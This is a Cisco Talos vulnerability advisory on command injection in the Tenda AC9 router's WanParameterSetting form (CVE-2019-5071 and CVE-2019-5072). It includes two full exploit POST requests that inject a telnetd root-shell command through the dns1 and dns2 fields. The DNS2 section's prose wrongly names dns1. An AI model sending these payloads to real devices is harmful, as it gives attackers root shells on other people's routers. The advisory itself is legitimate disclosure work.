Talos Vulnerability Report

TALOS-2019-0861

Tenda AC9 /goform/WanParameterSetting Command Injection Vulnerability

November 21, 2019
CVE Number

CVE-2019-5071-CVE-2019-5072

Summary

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16multiTRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

Tested Versions

AC9V1.0 Firmware V15.03.05.16multiTRU AC9V1.0 Firmware V15.03.05.14_EN

Product URLs

AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router

CVSSv3 Score

7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78: Improper Neutralization of Special Elements usedin an OS Command ('OS Command Injection')

Details

Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.

There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.

CVE-2019-5071 - Command injection in the DNS1 post parameters

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

 POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
 Host: 10.10.10.1
 Content-Length: 193
 Accept: */*
 Origin: http://10.10.10.1
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://10.10.10.1/main.html
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
 Connection: close

 wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1

CVE-2019-5072 - Command injection in the DNS2 post parameters

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

 POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
 Host: 10.10.10.1
 Content-Length: 193
 Accept: */*
 Origin: http://10.10.10.1
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://10.10.10.1/main.html
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
 Connection: close

 wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1

Timeline

2019-07-29 - Initial contact
2019-08-07 - Sent plain text file
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-21 - Public Release

Credit

Discovered by Amit N. Raut of Cisco Talos.